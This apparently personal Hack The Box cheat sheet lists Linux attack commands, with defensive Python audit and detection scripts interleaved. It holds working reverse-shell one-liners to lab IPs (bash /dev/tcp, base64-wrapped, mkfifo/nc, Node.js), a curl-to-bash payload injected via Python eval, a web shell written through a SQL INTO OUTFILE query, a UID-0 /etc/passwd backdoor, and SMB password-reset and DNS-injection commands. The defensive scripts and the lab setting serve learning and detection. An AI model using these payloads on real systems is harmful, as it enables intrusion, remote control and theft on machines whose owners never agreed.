HTB – Linux cmd

Linux OS command

>sudo -l -l

List the sudo rules allowed for the current user, then check each permitted binary against GTFOBins. A misconfigured sudoers file is a common PrivEsc path.

userA@machine:/$ sudo -l -l
...
Sudoers entry:
    RunAsUsers: user_admin
    RunAsGroups: user_admin
    Commands:
        sudoedit /test.json
...
userA@machine:/$ sudo -u user_admin sudoedit /test.json

When the sudoers entry allows a command to be run as another account (RunAsUsers), you have to pass "sudo -u [that user]" so that the command runs as the user named in the entry.
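The same rules can be reviewed from the defender's side. The following is an added example (not the page's own code, not from any HTB machine) that parses user specifications from sudoers-style content and flags the patterns that usually turn into PrivEsc: ALL commands, NOPASSWD tags, wildcards in arguments, and shell binaries. The sample sudoers content is constructed for the example; the fine-grained `userA ... sudoedit /test.json` entry from the page produces no finding.

```python
import os
import re

# One user specification line of /etc/sudoers:
#   who  host = (runas_user[:runas_group])  [TAG:] command[, command ...]
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(
    r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT):\s*")
SKIP_PREFIXES = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias", "@include")
SHELLS = {"bash", "sh", "dash", "zsh", "ksh"}


def audit_sudoers(text):
    """Flag risky user specifications in sudoers content.
    Returns a list of (line_no, who, command, reason); Defaults, alias and
    comment lines are skipped, so aliases referenced in specs are not expanded."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_PREFIXES):
            continue
        m = SPEC_RE.match(line)
        if not m:
            findings.append((no, "?", line, "unparsed line"))
            continue
        who, runas = m.group("who"), (m.group("runas") or "root")
        nopasswd = False  # a tag applies to every following command in the list
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            tag = TAG_RE.match(cmd)
            while tag:
                if tag.group(1) == "NOPASSWD":
                    nopasswd = True
                elif tag.group(1) == "PASSWD":
                    nopasswd = False
                cmd = cmd[tag.end():]
                tag = TAG_RE.match(cmd)
            if cmd == "ALL":
                findings.append((no, who, cmd, f"any command as ({runas})"))
            elif os.path.basename(cmd.split()[0]) in SHELLS:
                findings.append((no, who, cmd, "shell binary"))
            elif "*" in cmd:
                findings.append((no, who, cmd, "wildcard in command argument"))
            if nopasswd:
                findings.append((no, who, cmd, "NOPASSWD"))
    return findings


# Constructed sample for the example; not copied from any real host.
SAMPLE_SUDOERS = """Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
userA   ALL=(user_admin) sudoedit /test.json
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, /bin/bash
backup  ALL=(root) /usr/bin/tar -cf /backup/*.tar *
"""

if __name__ == "__main__":
    for line_no, who, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"line {line_no}: {who}: {cmd!r}: {reason}")
```

Run it against `sudo cat /etc/sudoers /etc/sudoers.d/*` output on a host you administer; every finding is something to justify or remove.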

>find / -type f -user root -perm -4000 -ls 2>/dev/null
>find / -type f -user root -perm -2000 -ls 2>/dev/null
>find / -type f -user root -perm -1000 -ls 2>/dev/null

Search for files with the SETUID (4000), SETGID (2000) or sticky (1000) bit set, as PrivEsc candidates. -type f returns regular files only; 2>/dev/null hides permission-denied errors.
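From the defender's side the useful question is not "which files have these bits" but "which files gained them since the last known-good state". The following is an added example, not the page's own code: it performs the three find(1) checks above in one pass and diffs the result against a recorded baseline. The `make_demo_tree` fixture is constructed for the example (setting the setuid bit on a file you own needs no privileges), so it runs as an ordinary user.

```python
import os
import stat
import tempfile

# The bits behind find's -perm -4000 / -2000 / -1000 checks.
SPECIAL_BITS = {"suid": stat.S_ISUID, "sgid": stat.S_ISGID, "sticky": stat.S_ISVTX}

# Pseudo-filesystems that only add noise (same idea as grep -v '^/proc' ...).
SKIP_DIRS = {"/proc", "/sys", "/run", "/dev"}


def find_special_bit_files(root):
    """Walk `root` and return {path: [bits]} for every regular file that has the
    setuid, setgid or sticky bit set. Unreadable entries are skipped, which is
    what 2>/dev/null does for the find(1) command."""
    results = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = [label for label, bit in SPECIAL_BITS.items() if st.st_mode & bit]
            if bits:
                results[path] = bits
    return results


def diff_against_baseline(current, baseline):
    """Compare a fresh scan with a baseline recorded from a known-good build.
    Returns (new, changed): files that gained special bits since the baseline,
    and files whose set of bits differs from the recorded one."""
    new = {p: b for p, b in current.items() if p not in baseline}
    changed = {p: b for p, b in current.items() if p in baseline and baseline[p] != b}
    return new, changed


def make_demo_tree():
    """Constructed fixture: a temp dir with one setuid file and one plain file.
    Returns (root, suid_path, plain_path)."""
    root = tempfile.mkdtemp(prefix="suid_audit_")
    suid_path = os.path.join(root, "suid_helper")
    plain_path = os.path.join(root, "plain_tool")
    for p in (suid_path, plain_path):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
    os.chmod(suid_path, 0o4755)
    os.chmod(plain_path, 0o755)
    return root, suid_path, plain_path


if __name__ == "__main__":
    root, suid_path, plain_path = make_demo_tree()
    scan = find_special_bit_files(root)
    new, changed = diff_against_baseline(scan, {})  # empty baseline: everything is new
    print("special-bit files:", scan)
    print("not in baseline:", new)
```

In practice the baseline is the scan of a freshly provisioned host saved to a file; a new entry in `new` means either a package update or something worth a closer look.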

>for i in `seq 1 10`; do echo $i; done

Print 1 to 10

>for i in {0..100}; do echo $i; done

Print 0 to 100 (brace expansion {0..100})

>for i in {0..100}; do echo -n "$i: "; curl -s http://enterprise.htb/wp-content/plugins/lcars/lcars_dbpost.php?query=$i; done

Loop $i from 0 to 100 and issue an HTTP request with curl for each value. echo -n prints without a trailing newline; curl -s is silent mode

>wget -r http://bankknab.htb/directory/

Download all files under that URL

>for line in `cat awk_users.txt`; do echo $line; done

Print every line of the file awk_users.txt

>cut -d ',' -f1

Split the string by ',' and print the value of the first column

>sed 's/\\r\\n\\r\\n/\n/g'

Replace each literal \r\n\r\n with a newline

>grep -v [string]

Inverse match: print only the lines that do not contain [string]

>grep -r 9999 .

Search for 9999 recursively in the current directory and its subdirectories. "." indicates the current directory

>find / -group kyle 2>/dev/null | grep -v -e '^/proc' -e '^/run' -e '^/sys'

Find files whose group is kyle, excluding everything under /proc, /run and /sys

>pstree

show running processes as a tree

>netstat -tnlp

List listening TCP ports with the owning process (-t TCP, -n numeric, -l listening, -p program)

>cat file | gzip | base64
>echo "base64 str" | base64 -d | gzip -d > output_bin

Compress + base64 the binary file
Base64 decode + decompress to get the original bin file

>echo "" | nc -nvw2 [targetIP] 20-80

Port scan by netcat

>nc -nvlp 8080 < file

Serve the file on TCP port 8080 (the first client that connects receives it)

>nc -nv [TargetIP] 8080 > output_file

Download file from Target IP 8080 port

>cat elf | base64 -w0
>echo "...base64..."| base64 -d > elf

Base64-encode the ELF file (-w0: no line wrapping) so it can be copy/pasted from the victim's PC to the attacker's PC, then decode it back

>curl -s -k [URL]

-s hides the progress output, -k ignores TLS certificate errors

>curl -s -G 'http://10.10.10.151/blog/' --data-urlencode 'lang=\\10.10.16.6\\HTB_Sniper\\test.txt' | sed -n '/<\/html>/,/<\/body>/p'

--data-urlencode together with -G means the string "lang=\\10.10.16.6\\HTB_Sniper\\test.txt" is URL-encoded and sent as the GET query string

>curl -H "User-agent: header" -v http://domain.com

-H means header, -v means display the request

>searchsploit vsftpd 2.3.4
vsftpd 2.3.4 - Backdoor Command Execution                                          | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                             | unix/remote/17491.rb
---------------------------------
Shellcodes: No Results

Quick search for an exploit in Kali by a simple keyword

>cat linpeas_output.txt | less -R

Keep the color when less the output of LinPEAS

Serve ELF by socat

>socat TCP4-LISTEN:9999,reuseaddr,fork EXEC:/home/elf

Run the elf executable behind 0.0.0.0:9999 for remote exploitation (fork: each connection gets its own process)

Reverse Shell

Online reverse shell generator revshells
HTML Encoding reference and quick table

>echo 'cmd /c "\\10.10.14.6\share\nc64.exe -e cmd 10.10.14.6 443"' | iconv -f ascii -t utf-16le | base64 -w0

Create a base64-encoded reverse shell payload. iconv converts the string to UTF-16LE encoding; base64 -w0 disables line wrapping.

>bash -i >& /dev/tcp/10.10.14.4/443 0>&1

Create a reverse shell back to 10.10.14.4 port 443

>bash -c "/bin/bash -i >& /dev/tcp/10.10.14.4/443 0>&1"
>echo "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/443 0>&1'" | base64
YmFzaCAtYyAnL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvNDQzIDA+JjEnCg==

>echo "YmFzaCAtYyAnL2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjQvNDQzIDA+JjEnCg==" | base64 -d | bash

Create a reverse shell back to 10.10.14.4 port 443

>......'username=;`echo+"[base64 payload]"+|+base64+-d+|+sh`'

Do not forget to decode and run the payload…(| base64 -d | sh)

>vi xxx.sh
#!/bin/bash
sh -i >& /dev/tcp/10.10.16.4/8888 0>&1
:wq!
>chmod +x xxx.sh

Create a reverse shell script and give it execute permission

>curl -v http://bad.php --data-urlencode 'cmd=bash -c "/bin/bash -i >& /dev/tcp/10.10.14.7/443 0>&1"'

TCP reverse shell, paired with "<?php system($_REQUEST["cmd"]); ?>" on the server side. Note that this curl request is a POST because of --data-urlencode

>cat reverse_shell
#!/bin/bash
sh -i >& /dev/tcp/10.10.16.4/8888 0>&1
>python3 -m http.server 80

>nc -lvnp 8888

>"')(__import__('os').system('curl http://10.10.16.4/reverse_shell|bash'))#"
  1. Host reverse_shell with "python3 -m http.server 80"
  2. Listen on port 8888 with nc
  3. Send the payload to exploit the vulnerability (python's eval here)
    The curl in 3 downloads and executes reverse_shell from 1
    → reverse_shell connects back to port 8888
    → the listener from 2 gets the shell
payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'

Payload used in CVE-2007-2447 (a Python string; lhost and lport are the listener). File descriptors: 0 is stdin, 1 is stdout, 2 is stderr. mkfifo creates a named pipe for IPC (Inter-Process Communication)
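All of the one-liners in this section share a handful of mechanisms (/dev/tcp redirection, an interactive shell with its descriptors redirected, a mkfifo/nc pipe, base64 decoding piped into a shell, curl piped into a shell, nc -e). The following is an added detection example, not code from the page: a small rule set over those mechanisms, run over constructed auditd-style EXECVE lines. The log lines are made up for the example (the IPs are the ones used on this page) and the rules match the technique rather than any one exact payload string.

```python
import re

# Each rule targets a mechanism rather than a fixed payload, so small rewrites
# of a one-liner still match. Order matters only for the order of reported names.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("interactive_shell_redirect", re.compile(r"\b(ba)?sh\s+-i\b.*(>&|&>)")),
    ("mkfifo_nc_pipe", re.compile(r"mkfifo\s+\S+.*\bnc\b.*\|\s*/bin/(ba)?sh")),
    ("base64_decode_to_shell", re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(ba)?sh\b")),
    ("curl_pipe_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("nc_exec_flag", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s+\S*(sh|cmd)\b")),
]


def scan_command(cmdline):
    """Return the names of all rules that match one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_log(lines):
    """Run every rule over each log line.
    Returns [(line_no, rule_names, line)] for lines hitting at least one rule."""
    hits = []
    for no, line in enumerate(lines, 1):
        names = scan_command(line)
        if names:
            hits.append((no, names, line))
    return hits


# Constructed sample log lines in an auditd-like shape; not real captures.
SAMPLE_LOG = [
    'type=EXECVE uid=33 comm="bash" cmdline="bash -i >& /dev/tcp/10.10.14.4/443 0>&1"',
    'type=EXECVE uid=33 comm="sh" cmdline="sh -c mkfifo /tmp/f; nc 10.10.14.4 443 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f"',
    'type=EXECVE uid=1000 comm="bash" cmdline="echo YmFzaCAtYy... | base64 -d | bash"',
    'type=EXECVE uid=1000 comm="sh" cmdline="curl http://10.10.16.4/reverse_shell|bash"',
    'type=EXECVE uid=1000 comm="sh" cmdline="nc -e /bin/sh 10.10.14.4 443"',
    'type=EXECVE uid=1000 comm="bash" cmdline="ls -la /var/www/html"',
    'type=EXECVE uid=0 comm="bash" cmdline="tar czf /backup/www.tgz /var/www"',
]

if __name__ == "__main__":
    for no, names, line in scan_log(SAMPLE_LOG):
        print(f"line {no}: {', '.join(names)}")
```

The interesting tuning knob is the parent process: the same command line run by a web server user (uid=33 above) is far more suspicious than one typed by an administrator, so in production these rules would be combined with the executing uid and comm fields rather than used alone.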

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "C:\\xampp\\htdocs\\backdoor.php"

Drop a web shell through phpMyAdmin. The query writes "backdoor.php" to the path "C:\\xampp\\htdocs\\"; the attacker can then run commands via http://[IP]/backdoor.php?cmd=...
If the query SHOW VARIABLES LIKE "secure_file_priv" returns nothing (an empty value), backdoor.php can be written to any location you want.

>python -c 'import pty;pty.spawn("bash")'
>^Z
zsh: suspended  nc -lvnp 443
>stty raw -echo; fg
[1]  + continued  nc -lvnp 443
>script /dev/null -c bash
>^Z
zsh: suspended  nc -lnvp 443
>stty raw -echo; fg
[1]  + continued  nc -lnvp 443

Upgrade the shell to a full TTY (tab completion, STDERR display, up-arrow history, etc.)

(function(){ 
    var net = require("net"), 
        cp = require("child_process"), 
        sh = cp.spawn("sh", []); 
    var client = new net.Socket(); 
    client.connect(9000, "10.10.16.6", function(){ 
        client.pipe(sh.stdin); 
        sh.stdout.pipe(client); 
        sh.stderr.pipe(client); 
    }); 
    return /a/; 
})();

JavaScript reverse shell

const fs = require('fs');
fs.readFile('/root/root.txt', 'utf8', (err, data) => {
    if (err) throw err;
    console.log(data);
});

JavaScript Code snippet to read the file on victim machine

SSH connection

>ssh user@[IP] -p [port]

Connect over SSH to a port other than 22

>chmod 600 ~/keys/id_rsa
>ssh -i [id_rsa(private key)] user@[IP]

SSH with a key pair (the private key must be chmod 600, otherwise ssh refuses to use it)

>scp -i id_rsa [ID]@[IP]:[/path/to/file] .

Copy a file from the server to the local directory over SSH

>ssh-keygen -l -f [privatekey]

Print the fingerprint and comment of the key

>ssh-keygen -p -f [privatekey]

Change the passphrase of the private key

SSH Port Forwarding – Tunnel

>ssh -L 25:127.0.0.1:25 [ID]@[Target IP]
>swaks -t root@domain.com -f test@example.com --h-Subject test-mail --server 127.0.0.1

Sometimes a port is only open on localhost, so we need to build a tunnel to it with SSH port forwarding. The first cmd forwards TCP port 25 on the attacker's machine to TCP port 25 on the victim's machine. The second cmd sends the email through the tunnel, so its server argument points to 127.0.0.1

>ssh -L 3000:127.0.0.1:3000 [ID]@[Target IP]
Then use the browser to access 127.0.0.1:3000

Another use case is the Gitea running on the victim’s localhost. Setup the port forwarding and access the GUI by attacker’s browser.
Also, Remote-Debugger-Port could be attacked by port forwarding. Details here

Port Forwarding – chisel

# Drop chisel onto the remote machine
# On the local machine
>python3 -m http.server

# On the remote machine
>wget http://<local-ip>:8000/chisel
>chmod +x chisel

# On the local machine
>./chisel server -p 8000 --reverse

# On the remote machine
>./chisel client 10.10.16.2:8000 R:8001:127.0.0.1:8001

Then use the browser to access 127.0.0.1:8001

It is useful when we want to access to the host & the port that cannot be directly accessible from local machine. Details

Exploit /etc/passwd

>openssl passwd -1 [password]
$1$5Y0rsBri$UBTLeVNheII/4dkXWeaHv/
>echo '[username]:$1$5Y0rsBri$UBTLeVNheII/4dkXWeaHv/:0:0:pwned:/root:/bin/bash'
>su - [username]
Password:
#whoami
root

Manually edit /etc/passwd to PrivEsc: the generated hash goes into the password field of a UID 0 entry
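The trick above leaves two traces a defender can check for: a second UID 0 account and a password hash sitting in /etc/passwd instead of /etc/shadow. The following is an added example, not the page's own code: an integrity check over /etc/passwd content that reports exactly those conditions plus malformed, duplicate and empty-password entries. The sample passwd content is constructed for the example; the tampered line reuses the hash shown on this page.

```python
import re

# Password-field values that carry no hash: the hash lives in /etc/shadow (x),
# or the account is locked / has no usable password (*, !, !!).
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}
# crypt(3) prefixes: MD5-crypt, bcrypt, SHA-256/512-crypt, yescrypt.
HASH_RE = re.compile(r"^\$(1|2[abxy]?|5|6|y)\$")


def audit_passwd(text):
    """Check /etc/passwd content for tampering.
    Returns a list of (line_no, username, finding) tuples; an empty list is clean."""
    findings = []
    seen_names = {}
    for no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            findings.append((no, raw, "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        if name in seen_names:
            findings.append((no, name, f"duplicate username (first seen on line {seen_names[name]})"))
        seen_names.setdefault(name, no)
        try:
            uid_n = int(uid)
        except ValueError:
            findings.append((no, name, f"non-numeric uid {uid!r}"))
            continue
        if uid_n == 0 and name != "root":
            findings.append((no, name, "uid 0 account other than root"))
        if pw not in SHADOWED_OR_LOCKED:
            if HASH_RE.match(pw):
                findings.append((no, name, "password hash stored in /etc/passwd instead of /etc/shadow"))
            elif pw == "":
                findings.append((no, name, "empty password field (login without password)"))
            else:
                findings.append((no, name, f"unexpected password field {pw!r}"))
    return findings


# Constructed samples for the example; not copied from a real host.
CLEAN_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
kyle:x:1000:1000:kyle:/home/kyle:/bin/bash
"""
TAMPERED_PASSWD = CLEAN_PASSWD + "pwned:$1$5Y0rsBri$UBTLeVNheII/4dkXWeaHv/:0:0:pwned:/root:/bin/bash\n"

if __name__ == "__main__":
    for line_no, name, finding in audit_passwd(TAMPERED_PASSWD):
        print(f"line {line_no} ({name}): {finding}")
```

Running this from a cron job against the live file, and alerting on any non-empty result, catches this PrivEsc technique regardless of which editor or echo trick was used to append the line.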

>su [user]

Switch to a user whose password you found during reconnaissance

DNS tools

DNS recon in hacktricks

>dig @[DNS server IP] domain.name
>dig @[DNS server IP] FQDN
>dig axfr @[DNS server IP] domain.name

Fetch DNS records over UDP/TCP 53. axfr requests a zone transfer

>dnsrecon -r 127.0.0.0/24 -n 10.10.30.10 
>dnsrecon -r 10.10.30.0/24 -n 10.10.30.10 

Reverse DNS lookup of all addresses in the range (127.0.0.0/24 and 10.10.30.0/24) against the name server 10.10.30.10

>nmap -n --script "(default and *dns*) or fcrdns or dns-srv-enum or dns-random-txid or dns-random-srcport" [IP]

Perform DNS enumeration with the nmap scripts. It gives results the default nmap scan does not

>dnsenum -dnsserver 10.10.10.248 -f /usr/share/seclists/Discovery

Brute-force the DNS subdomain

>python3 DNSUpdate.py -DNS 10.10.10.24 -u '[Domain]\[User]' -p '[PW]' -a ad -r web-test -d 10.10.16.4

DNSUpdate.py can add a DNS record to the remote DNS server. -a ad means add a record, -r is the record name, -d is the record data, usually set to the attacker's IP address

>python3 dnstool.py -u '[Domain]\[User]' -p '[PW]' --action add --type A --record 'web-NL' --data '10.10.16.40' [DNS Server IP]

dnstool.py can add a DNS record to the remote DNS server. Basically the same as DNSUpdate.py

SMB tools

>smbpasswd -r [IP] -U [Username]

Reset the SMB password

>smbclient -N -L 10.10.10.16

Connect to SMB/CIFS resources on TCP 445. -N means don't ask for a password, -L lists all available shares on the host

>smbclient '\\[IP Address]\[share]' --user=[user] --password=[PW]

Log in to the share folder

>smbclient '\\10.10.10.178\F$' --user=[ID] --password=[PW]
>smb: \IT\RU\> recurse on
>smb: \IT\RU\> prompt off
>smb: \IT\RU\> mget *

Use smbclient to download the files recursively

>smbclient '\\10.10.10.178\F$' --user=[ID] --password=[PW]
>smb: \IT\RU\> allinfo "file.txt"
altname: file~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Wed Jul 21 02:47:12 PM 2021 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
>smb: \IT\RU\> get "file.txt:Password"

Display the file's metadata and its alternate data streams, then use the "get" command to download the alternate stream

>smbmap -H 10.10.10.161 -u null

Enumerate SMB shares on TCP 445

>smbmap -H 10.10.10.178 -u [User] -p [PW] -R 'Data'

Enumerate SMB folder “Data” recursively

>rpcclient -U "" -N 10.10.10.161
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> enumdomains
rpcclient $> enumprinters
rpcclient $> querygroup [group rid]
rpcclient $> querygroupmem [group rid]
rpcclient $> queryuser [user rid]
rpcclient $> querydispinfo

Connect to TCP 445 by RPC(Remote Procedure Call) protocol. -U is username, -N is don’t ask for a password
querydispinfo will list the users with description

>rpcclient -U [ID] //10.10.10.161
rpcclient $> setuserinfo2 [ID] 23 'New Password'

Connect to TCP 445 over RPC with a user/password, then change another account's password. Details here.

>telnet 10.10.10.34 25  #Connect to SMTP server
>RCPT TO: <test@reel.com>   #Check if the user test in the mail server or not
250 OK    #The user exists
>RCPT TO: <NL@reel.com>
550 Unknown user

Connect to the SMTP server and check whether a user exists

>sendEmail -f NL@NL.com -t TO@domain.com -u "Subject" -m "Content" -a attachment.txt -s 10.10.10.55 -v

Send an email with a Kali tool. -f means FROM, -t means TO, -u means SUBJECT, -m means MAIL CONTENT, -a means attachment, -s is the IP address of the SMTP server to send through, -v means VERBOSE.

FTP

>wget -m ftp://anonymous:anonymous@10.10.10.98

Download all files via anonymous login (-m mirrors the whole tree recursively)

>ftp [IP]
>anonymous
>anonymous
>ls -a # List all files (even hidden) (yes, they could be hidden)

anonymous login

LDAP

>ldapsearch -h [IP] -x -s base namingcontexts
>ldapsearch -H ldap://[IP] -x -s base namingcontexts

Query the LDAP root DSE for the namingContexts attribute (the base DNs served)

>ldapsearch -h [IP] -b "DC=[Domain],DC=local" -D '[ID]@[Domain]' -w '[PW]'

Search LDAP with Creds

XXD

>hexdump -e '16/1 "%02x " "\n"' file.bin

Dump to hex without address

PHP local shell

>which php
>php -a
php>phpinfo();
php>dl('phpextension.so');

About the author

Nelley, 乃力.
Just a villager.